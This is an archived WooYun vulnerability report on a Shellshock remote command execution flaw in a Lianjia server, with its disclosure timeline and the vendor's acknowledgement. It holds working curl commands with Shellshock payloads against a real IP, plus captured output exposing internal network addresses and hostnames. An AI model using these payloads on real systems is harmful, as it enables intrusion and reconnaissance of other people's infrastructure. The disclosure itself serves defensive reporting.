乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
链家某服务器存在远程命令执行漏洞
bash shellshock 命令执行漏洞 http://drops.wooyun.org/papers/3268
curl http://119.254.70.180/cgi-bin/test-cgi -A "() { foo;};echo;/sbin/ifconfig -a" -keth0 Link encap:Ethernet HWaddr 00:50:56:AB:00:8E inet addr:172.16.4.130 Bcast:172.16.4.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:feab:8e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2795801655 errors:0 dropped:0 overruns:0 frame:0 TX packets:2726564861 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:285792000596 (266.1 GiB) TX bytes:184857401735 (172.1 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:1312216838 errors:0 dropped:0 overruns:0 frame:0 TX packets:1312216838 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:77787838938 (72.4 GiB) TX bytes:77787838938 (72.4 GiB)sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00 inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:42 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:7233 (7.0 KiB)
curl http://119.254.70.180/cgi-bin/test-cgi -A "() { foo;};echo;/bin/cat /etc/hosts" -k# Do not remove the following line, or various programs# that require network functionality will fail.172.16.192.120 ShiJiCheng172.16.15.111 JiangYouYi172.16.15.250 DaoXiangYuan172.16.4.130 homeshowtest127.0.0.1 localhostJiangYouYi:namenodeDaoXiangYuan:datanodehomeshowtest:datanodeJiangYouYi:masterDaoXiangYuan:regionserverhomeshowtest:regionserver10.20.5.4 op.homelink.com.cn172.16.0.107 itplus.homelink.com.cn
删除掉这个测试文件,或者升级bash
危害等级:中
漏洞Rank:8
确认时间:2015-08-25 14:05
谢谢,马上处理。
暂无